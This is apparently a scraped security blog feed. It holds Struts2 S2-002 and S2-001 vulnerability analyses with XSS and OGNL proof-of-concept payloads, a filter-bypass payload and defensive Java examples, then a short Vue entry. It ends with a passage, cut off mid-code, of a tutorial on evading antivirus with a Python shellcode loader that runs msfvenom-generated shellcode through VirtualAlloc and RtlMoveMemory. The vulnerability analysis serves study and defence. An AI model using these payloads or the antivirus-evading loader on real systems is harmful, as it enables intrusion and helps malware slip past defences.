<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">http://192.168.174.1:8888/Struts2_demo_war_exploded/?<span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure>
<p>the parsed map is <code>key = <script>alert(1)</script>, value = ""</code>. No filtering is applied to the parameter at any point: <code>getParameterMap()</code> does not process the data in any way. <a href="#demo">See the demo below.</a></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142411460.png" alt="image-20201221142411460"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142719076.png" alt="image-20201221142719076"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221142946058.png" alt="image-20201221142946058"></p>
<p>Finally the <code>doEndTag</code> method is entered for processing.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221170346052.png" alt="image-20201221170346052"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221170317717.png" alt="image-20201221170317717"></p>
<p>The <code>determineActionURL</code> method calls the <code>URLHelper</code> class to process <code>this.parameters</code> and returns the result.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153821932.png" alt="image-20201221153821932"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153301168.png" alt="image-20201221153301168"></p>
<p>This result is written into the page output unescaped, which is the XSS vulnerability.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221153500644.png" alt="image-20201221153500644"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113854119.png" alt="image-20201222113854119"></p>
<p>With <code>includeParams=get</code>, the XSS cannot be triggered.</p>
<p>The main reason is that when <code>includeParams=all</code>, the extra <code>mergeRequestParameters</code> method runs and copies the <code>this.req.getParameterMap()</code> data into <code>this.parameters</code>. With <code>includeParams=get</code>, the data in <code>this.parameters</code> comes only from <code>this.req.getQueryString()</code>.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113001419.png" alt="image-20201222113001419"></p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222113440372.png" alt="image-20201222113440372"></p>
<p>The data obtained from <code>this.req.getParameterMap()</code> is automatically <code>URLdecode</code>d, whereas <code>this.req.getQueryString()</code> is not. So with <code>includeParams=get</code> the returned data is still <code>URLencode</code>d and therefore cannot trigger the XSS. <a href="#demo">See the demo below.</a></p>
<h4 id="demo实例"><a href="#demo实例" class="headerlink" title="demo实例"></a>Demo</h4><p><span id="demo">Demo</span></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="keyword">package</span> com.test;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> javax.servlet.ServletException;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.annotation.WebServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServlet;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletRequest;</span><br><span class="line"><span class="keyword">import</span> javax.servlet.http.HttpServletResponse;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.util.Iterator;</span><br><span class="line"><span class="keyword">import</span> java.util.Map;</span><br><span class="line"></span><br><span class="line"><span class="meta">@WebServlet</span>(<span class="string">"/test"</span>)</span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Hello</span> <span class="keyword">extends</span> <span class="title">HttpServlet</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="meta">@Override</span></span><br><span class="line"> <span class="function"><span class="keyword">protected</span> <span class="keyword">void</span> <span class="title">doGet</span><span class="params">(HttpServletRequest request, HttpServletResponse resp)</span> <span class="keyword">throws</span> ServletException, IOException </span>{</span><br><span class="line"> System.out.println(<span class="string">"getQueryString:"</span>+<span class="string">"\n"</span>+request.getQueryString());</span><br><span class="line"> Map<String, String[]> parameterMap = request.getParameterMap();</span><br><span class="line"> Iterator<Map.Entry<String, String[]>> iterator = parameterMap.entrySet().iterator();</span><br><span class="line"> <span class="keyword">while</span> (iterator.hasNext()){</span><br><span class="line"> Map.Entry<String, String[]> next = iterator.next();</span><br><span class="line"> System.out.println(<span class="string">"getParameterMap:"</span>+<span class="string">"\n"</span>+<span class="string">"key="</span>+next.getKey()+<span class="string">'\n'</span>+<span class="string">"value="</span>+next.getValue()[<span class="number">0</span>]);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201221180716399.png" alt="image-20201221180716399"></p>
<p>Poc:</p>
<figure class="highlight js"><table><tr><td class="code"><pre><span class="line">?<span class="xml"><span class="tag"><<span class="name">script</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span></span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>Fix</h4><p>According to the bulletin, we need to upgrade to Struts 2.0.11.1. This is not a real fix: it merely replaces the literal script tag, and can still be bypassed.</p>
<p><img src="/img/Struts2-002-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201222111554160.png" alt="image-20201222111554160"></p>
<p>bypass POC:</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line">?<span class="tag"><<span class="name">script</span> <span class="attr">1</span>></span>alert(1)<span class="tag"></<span class="name">script</span>></span></span><br><span class="line">?<span class="tag"><<span class="name">strong</span>></span>script<span class="tag"></<span class="name">strong</span>></span></span><br><span class="line">...</span><br></pre></td></tr></table></figure>
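<p>The following is an added example, not code from this post or from Struts' <code>URLHelper</code>. It rebuilds a query string from a <code>getParameterMap()</code>-shaped map in two ways: a tag-replacement stand-in for the 2.0.11.1 behaviour described above, and percent-encoding of every key and value, which is what a correct fix has to do. The class name and method names are assumptions, and the parameter map is constructed to match the bypass request shown above.</p>

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashMap;
import java.util.Map;

/**
 * Added example (not Struts' URLHelper): building a query string from
 * getParameterMap() data. Contrast a tag-replacement "fix" with proper encoding.
 * Requires Java 10+ for URLEncoder.encode(String, Charset).
 */
public final class QueryStringBuilder {

    /** Stand-in for the replace-the-script-tag approach described in the fix section. */
    static String buildWithReplace(Map<String, String[]> params) {
        StringBuilder sb = new StringBuilder();
        for (Map.Entry<String, String[]> e : params.entrySet()) {
            for (String v : e.getValue()) {
                if (sb.length() > 0) sb.append('&');
                sb.append(e.getKey().replace("<script>", "").replace("</script>", ""))
                  .append('=')
                  .append(v.replace("<script>", "").replace("</script>", ""));
            }
        }
        return sb.toString();
    }

    /** Percent-encode every key and value: nothing from the request reaches the page as markup. */
    static String buildEncoded(Map<String, String[]> params) {
        StringBuilder sb = new StringBuilder();
        for (Map.Entry<String, String[]> e : params.entrySet()) {
            for (String v : e.getValue()) {
                if (sb.length() > 0) sb.append('&');
                sb.append(URLEncoder.encode(e.getKey(), StandardCharsets.UTF_8))
                  .append('=')
                  .append(URLEncoder.encode(v, StandardCharsets.UTF_8));
            }
        }
        return sb.toString();
    }

    /** Escape for placement inside an HTML attribute such as href="...". */
    static String htmlAttr(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Constructed sample: the parameter map a container would produce for the
        // bypass request "?<script 1>alert(1)</script>" from the section above.
        Map<String, String[]> params = new LinkedHashMap<>();
        params.put("<script 1>alert(1)</script>", new String[]{""});
        params.put("q", new String[]{"a b"});
        System.out.println("replace : " + buildWithReplace(params));   // the tag survives untouched
        System.out.println("encoded : " + buildEncoded(params));       // %3Cscript+1%3Ealert%281%29...
        System.out.println("in href : href=\"/login.action?" + htmlAttr(buildEncoded(params)) + "\"");
    }
}
```

<p>Two layers are needed, and both are output encoding rather than input filtering: the query string is percent-encoded so that keys and values cannot contain raw markup, and the whole URL is then attribute-escaped at the point where it is written into the <code>href</code>. A string replacement of one specific tag, as the fix section notes, protects against that one spelling only.</p>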
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://cwiki.apache.org/confluence/display/WW/S2-002" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-002</a></p>
<p><a href="https://xz.aliyun.com/t/7916" target="_blank" rel="noopener">https://xz.aliyun.com/t/7916</a></p>
<p><a href="https://dean2021.github.io/posts/s2-002/" target="_blank" rel="noopener">https://dean2021.github.io/posts/s2-002/</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Struts2-001 Vulnerability Analysis</title>
<url>/2020/12/24/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-001" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>When an HTTP request is handled by Struts2, the site's configuration file <code>web.xml</code> is read first. It declares a filter, <code>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</code>; after that filter has run, the request passes through a series of interceptors, which may be the defaults or user-defined ones.</p>
<p>Struts2 request processing flow (from 攻击JavaWeb应用 [5], "Attacking JavaWeb Applications"):</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201225113205710.png" alt="image-20201225113205710"></p>
<figure class="highlight lsl"><table><tr><td class="code"><pre><span class="line">A few concepts first</span><br><span class="line">The interceptor concept</span><br><span class="line">Interceptors are one of the core features of the Struts2 framework. Struts 2 is an open-source framework based on the MVC design pattern [3] that mainly handles parsing request parameters, assigning page form parameters to the corresponding properties on the value stack, performing validation, debugging program exceptions and so on. Struts2 interceptors are a pluggable strategy that implements aspect-oriented component development: to extend functionality you only need to provide the corresponding interceptor and configure it in the Struts2 container, and to drop a feature you only need to remove that interceptor's setting from the configuration file, with no extra code from the user. The more important concept within interceptors is the interceptor stack: a linear chain of Struts2 interceptors arranged in a fixed order. When a page issues a request that accesses an Action object or method, the interceptors configured on the stack are invoked in order following stack semantics. </span><br><span class="line"></span><br><span class="line">In plain terms: Struts2 is a framework whose features are encapsulated in interceptors. There are many of them, and not all of them run on every request; the default ones run every time, and they are defined in struts2-core-2.0.8.jar!\struts-default.xml. Interceptor execution follows the AOP idea: the action does not call interceptor methods directly, they are wired in through the configuration file. Running a series of interceptors uses the chain-of-responsibility pattern; for example, with three interceptors: run interceptor 1 -> pass -> run interceptor 2 -> pass -> run interceptor 3 -> pass -> run the action method.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">When do interceptors run?</span><br><span class="line">After the action object is created and before the action method executes</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>For example, in the <code>struts.xml</code> shown below, the <code>package</code> inherits the default <code>struts</code> interceptors (struts-default); see <code>struts-default.xml</code> for the full list.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/simage-20201218102840514.png" alt="image-20201218102840514"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218104357386.png" alt="image-20201218104357386"></p>
<p>Here we focus on the <code>params</code> interceptor, whose code is at <code>xwork-2.0.3.jar!\com\opensymphony\xwork2\interceptor\ParametersInterceptor.class</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218111703265.png" alt="image-20201218111703265"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218113626884.png" alt="image-20201218113626884"></p>
<p>After passing through the series of interceptors, the data reaches the actual business <code>Action</code>. Based on the result the <code>Action</code> returns, the program selects the corresponding <code>JSP</code> view to render and processes the <code>Struts2</code> tags in that view.</p>
<p>In this example, the <code>Action</code> that handles the user login returns <code>error</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144456659.png" alt="image-20201218144456659"></p>
<p>Based on the returned result and the view defined earlier in <code>struts.xml</code>, the program starts processing <code>index.jsp</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144537239.png" alt="image-20201218144537239"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218144810408.png" alt="image-20201218144810408"></p>
<p>From the code we can see that <code>struts2</code> uses a custom tag library, <code>/struts-tags</code>. Reading <code>struts2-core-2.0.8.jar!/META-INF/struts-tags.tld</code> tells us that the <code>textfield</code> tag is implemented by <code>org.apache.struts2.views.jsp.ui.TextFieldTag</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220153156591.png" alt="image-20201220153156591"></p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201220153226282.png" alt="image-20201220153226282"></p>
<p>Anyone familiar with JSP custom tags will know that we now need to find the <code>doStartTag</code> method, since tag processing starts there (see <a href="https://blog.csdn.net/zljjava/article/details/17420809" target="_blank" rel="noopener">TagSupport explained</a> for details). We find <code>doStartTag</code> in <code>ComponentTagSupport</code>, the parent class of <code>TextFieldTag</code>.</p>
<p>When a <code>Struts2</code> tag is encountered in a <code>JSP</code> file, because all S2 tag classes inherit from <code>ComponentTagSupport</code>, the program first calls <code>doStartTag</code>, which copies the tag's attributes into the corresponding properties of the <code>TextFieldTag</code> object.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218154513302.png" alt="image-20201218154513302"></p>
<p>Finally, when the closing <code>/></code> of the tag is reached, the <code>doEndTag</code> method is called.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152120932.png" alt="image-20201218152120932"></p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">int</span> <span class="title">doEndTag</span><span class="params">()</span> <span class="keyword">throws</span> JspException </span>{</span><br><span class="line"> <span class="keyword">this</span>.component.end(<span class="keyword">this</span>.pageContext.getOut(), <span class="keyword">this</span>.getBody());</span><br><span class="line"> <span class="keyword">this</span>.component = <span class="keyword">null</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="number">6</span>;</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>We step into <code>this.component.end</code>, which calls <code>this.evaluateParams();</code> to fill in the dynamic data in the <code>JSP</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152528873.png" alt="image-20201218152528873"></p>
<p>Stepping into <code>this.evaluateParams</code>, we find that if <code>OGNL</code> expression support is enabled (<code>this.altSyntax()</code>), the attribute name is wrapped in <code>OGNL</code> expression syntax (<code>%{name}</code>).</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218152851979.png" alt="image-20201218152851979"></p>
<p>Then <code>findValue</code> is used to obtain the value of that expression from the value stack. We step into <code>findValue</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153309872.png" alt="image-20201218153309872"></p>
<p>When <code>altSyntax</code> is enabled and <code>toType</code> is <code>class java.lang.String</code>, <code>findValue</code> calls <code>TextParseUtil.translateVariables</code>.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153519551.png" alt="image-20201218153519551"></p>
<p>We step into that method.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153626893.png" alt="image-20201218153626893"></p>
<p>We find that the method is overloaded.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218153722178.png" alt="image-20201218153722178"></p>
<p>The <code>expression</code> passed to <code>translateVariables</code> is <code>%{password}</code>. After <code>OGNL</code> evaluation the program obtains its value, <code>%{1+1}</code> (the payload we submitted). Because a <code>while</code> loop is used to parse the <code>OGNL</code>, the <code>%{1+1}</code> just obtained is parsed again on the next iteration, which ultimately results in arbitrary code execution.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201218154234294.png" alt="image-20201218154234294"></p>
<p>Key code:</p>
<figure class="highlight java"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">public</span> <span class="keyword">static</span> Object <span class="title">translateVariables</span><span class="params">(<span class="keyword">char</span> open, String expression, ValueStack stack, Class asType, TextParseUtil.ParsedValueEvaluator evaluator)</span> </span>{</span><br><span class="line"> Object result = expression;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(<span class="keyword">true</span>) {</span><br><span class="line"> <span class="keyword">int</span> start = expression.indexOf(open + <span class="string">"{"</span>);</span><br><span class="line"> <span class="keyword">int</span> length = expression.length();</span><br><span class="line"> <span class="keyword">int</span> x = start + <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">int</span> count = <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span>(start != -<span class="number">1</span> && x < length && count != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">char</span> c = expression.charAt(x++);</span><br><span class="line"> <span class="keyword">if</span> (c == <span class="string">'{'</span>) {</span><br><span class="line"> ++count;</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span> (c == <span class="string">'}'</span>) {</span><br><span class="line"> --count;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> end = x - <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">if</span> (start == -<span class="number">1</span> || end == -<span class="number">1</span> || count != <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> String <span class="keyword">var</span> = expression.substring(start + <span class="number">2</span>, end);</span><br><span class="line"> Object o = stack.findValue(<span class="keyword">var</span>, asType);</span><br><span class="line"> <span class="keyword">if</span> (evaluator != <span class="keyword">null</span>) {</span><br><span class="line"> o = evaluator.evaluate(o);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> String left = expression.substring(<span class="number">0</span>, start);</span><br><span class="line"> String right = expression.substring(end + <span class="number">1</span>);</span><br><span class="line"> <span class="keyword">if</span> (o != <span class="keyword">null</span>) {</span><br><span class="line"> <span class="keyword">if</span> (TextUtils.stringSet(left)) {</span><br><span class="line"> result = left + o;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> result = o;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> (TextUtils.stringSet(right)) {</span><br><span class="line"> result = result + right;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> expression = left + o + right;</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> result = left + right;</span><br><span class="line"> expression = left + right;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> }</span><br></pre></td></tr></table></figure>
<p>The root cause, then, is that <code>translateVariables</code> parses the expression recursively: after handling <code>%{password}</code>, it splices the value of <code>password</code> back into the string and keeps parsing it in the <code>while</code> loop. If the <code>password</code> supplied by the user is a malicious <code>OGNL</code> expression such as <code>%{1+1}</code>, it is parsed and executed.</p>
<p>POC:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">%{<span class="number">1</span>+<span class="number">1</span>}</span><br></pre></td></tr></table></figure>
<h4 id="修复"><a href="#修复" class="headerlink" title="修复"></a>Fix</h4><p>A check against recursive parsing was added.</p>
<p><img src="/img/Struts2-001-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/image-20201224171538096.png" alt="image-20201224171538096"></p>
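<p>The following is an added example, not code from this post or from Struts' <code>TextParseUtil</code>. It models the parsing loop from the key code above in two forms: one that re-scans the whole string after every substitution (the S2-001 behaviour) and one that scans left to right exactly once, so a substituted value is copied as text and never parsed. The <code>ValueStack</code> and OGNL evaluation are replaced by a plain map lookup, which is an assumption made to keep the example self-contained; the class, interface and method names are likewise made up for the example, and the single-pass version illustrates the principle rather than reproducing the vendor's patch line for line.</p>

```java
import java.util.HashMap;
import java.util.Map;

/**
 * Added example (not Struts' TextParseUtil): the difference between re-scanning
 * substituted output (the S2-001 pattern) and scanning each %{...} only once.
 * The ValueStack / OGNL evaluation is modelled by a map lookup, so this class
 * only demonstrates the parsing loop, not OGNL itself.
 */
public final class VariableTranslator {

    /** Stand-in for stack.findValue(var): the value bound to the name, or null. */
    interface Lookup { String find(String var); }

    /** Finds the %{...} starting at 'from'; returns {start, indexOfClosingBrace} or null. */
    private static int[] nextExpression(String s, int from) {
        int start = s.indexOf("%{", from);
        if (start < 0) return null;
        int depth = 1, x = start + 2;
        while (x < s.length() && depth != 0) {
            char c = s.charAt(x++);
            if (c == '{') depth++;
            else if (c == '}') depth--;
        }
        return depth == 0 ? new int[]{start, x - 1} : null;
    }

    /** Re-scans from index 0 after every substitution, like the vulnerable loop above. */
    static String translateRescanning(String expression, Lookup stack) {
        while (true) {
            int[] m = nextExpression(expression, 0);
            if (m == null) return expression;
            String var = expression.substring(m[0] + 2, m[1]);
            String value = stack.find(var);
            String replacement = value == null ? "" : value;
            // The substituted value is spliced back and the whole string is parsed again.
            expression = expression.substring(0, m[0]) + replacement + expression.substring(m[1] + 1);
        }
    }

    /** Scans left to right once; substituted values are copied verbatim and never re-parsed. */
    static String translateSinglePass(String expression, Lookup stack) {
        StringBuilder out = new StringBuilder();
        int pos = 0;
        while (true) {
            int[] m = nextExpression(expression, pos);
            if (m == null) {
                out.append(expression, pos, expression.length());
                return out.toString();
            }
            out.append(expression, pos, m[0]);
            String value = stack.find(expression.substring(m[0] + 2, m[1]));
            if (value != null) out.append(value);
            pos = m[1] + 1;   // continue after the closing brace, never from 0
        }
    }

    public static void main(String[] args) {
        // Constructed bindings: "password" holds the submitted text, and the "1+1" entry
        // stands in for what OGNL would compute if that expression were evaluated.
        Map<String, String> bindings = new HashMap<>();
        bindings.put("password", "%{1+1}");
        bindings.put("1+1", "2");
        Lookup stack = bindings::get;

        System.out.println("rescanning : " + translateRescanning("%{password}", stack)); // 2
        System.out.println("single pass: " + translateSinglePass("%{password}", stack)); // %{1+1}
    }
}
```

<p>With the same bindings, the re-scanning loop resolves <code>%{password}</code> to <code>%{1+1}</code> and then resolves that too, printing <code>2</code>; the single-pass loop prints the literal text <code>%{1+1}</code> because data returned from a lookup is output, not input. That distinction between template text and user-supplied values is the property the fix has to restore.</p>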
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://xz.aliyun.com/t/7915" target="_blank" rel="noopener">https://xz.aliyun.com/t/7915</a></p>
<p><a href="https://xz.aliyun.com/t/2044" target="_blank" rel="noopener">https://xz.aliyun.com/t/2044</a></p>
<p><a href="https://dean2021.github.io/posts/s2-001/" target="_blank" rel="noopener">https://dean2021.github.io/posts/s2-001/</a></p>
<p><a href="https://cwiki.apache.org/confluence/display/WW/S2-001" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-001</a></p>
]]></content>
<tags>
<tag>Struts2</tag>
</tags>
</entry>
<entry>
<title>Vue.js 学习笔记</title>
<url>/2020/12/14/Vue.js/</url>
<content><![CDATA[<iframe id="embed_dom" name="embed_dom" frameborder="0" style="display:block;width:100%; height:600px;" src="https://www.processon.com/view/link/5fd6d7185653bb06f33b70d6"></iframe>
<a id="more"></a>
<p>PNG version</p>
<p><a href="http://assets.processon.com/chart_image/5fcf37041e085306e0e6c8b1.png" target="_blank" rel="noopener">http://assets.processon.com/chart_image/5fcf37041e085306e0e6c8b1.png</a></p>
]]></content>
<tags>
<tag>Vue</tag>
</tags>
</entry>
<entry>
<title>Python Shellcode加载器绕过AV</title>
<url>/2020/12/07/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/</url>
<content><![CDATA[<h4 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h4><figure class="highlight asciidoc"><table><tr><td class="code"><pre><span class="line">免杀技术大致分为有以下几类:</span><br><span class="line">特征码修改</span><br><span class="line">花指令免杀</span><br><span class="line">加壳免杀</span><br><span class="line">内存免杀</span><br><span class="line">二次编译</span><br><span class="line">分离免杀</span><br><span class="line">资源修改</span><br><span class="line">...</span><br><span class="line">Ps: 不管使用哪种技术,能绕过AV(AntiVirus)达到效果的,都是好的。</span><br></pre></td></tr></table></figure>
<p>This post uses the separation approach: the shellcode is kept apart from a loader written in Python.</p>
<p>The idea and method is to encode the shellcode, separate it from the loader, and use deserialization to achieve the bypass.</p>
<a id="more"></a>
<h4 id="ShellCode"><a href="#ShellCode" class="headerlink" title="ShellCode"></a>ShellCode</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line">什么是<span class="keyword">ShellCode?</span></span><br><span class="line"><span class="keyword">答:一段用于利用软件漏洞而执行的代码</span></span><br></pre></td></tr></table></figure>
<p>这里我们利用Cobalt Strike生成的ShellCode</p>
<p><img src="/img/Python%20Shellcode%E5%8A%A0%E8%BD%BD%E5%99%A8%E7%BB%95%E8%BF%87AV/image-20201205145223046.png" alt="image-20201205145223046"></p>
<h4 id="ShellCode加载器"><a href="#ShellCode加载器" class="headerlink" title="ShellCode加载器"></a>ShellCode加载器</h4><figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line">什么是<span class="keyword">ShellCode加载器?</span></span><br><span class="line"><span class="keyword">答:即专门用于加载所提供ShellCode的工具。</span></span><br></pre></td></tr></table></figure>
<p>以Python为例:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line"><span class="comment"># "msfvenom -p windows/x64/exec CMD=calc.exe -f python"生成的计算器的ShellCode</span></span><br><span class="line">shellcode = <span class="string">b"\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]H\xba\x01\x00\x00\x00\x00\x00\x00\x00H\x8d\x8d\x01\x01\x00\x00A\xba1\x8bo\x87\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5calc.exe\x00"</span></span><br><span class="line"> </span><br><span class="line">shellcode = bytearray(shellcode)</span><br><span class="line"><span class="comment"># 设置VirtualAlloc返回类型为ctypes.c_uint64</span></span><br><span class="line">ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64</span><br><span class="line"><span class="comment"># 申请内存</span></span><br><span class="line">ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(<span class="number">0</span>), ctypes.c_int(len(shellcode)), ctypes.c_int(<span class="number">0x3000</span>), ctypes.c_int(<span class="number">0x40</span>))</span><br><span class="line"> </span><br><span class="line"><span class="comment"># 放入shellcode</span></span><br><span class="line">buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(</span><br><span class="line"> ctypes.c_uint64(ptr), </span><br><span class="line"> buf, 
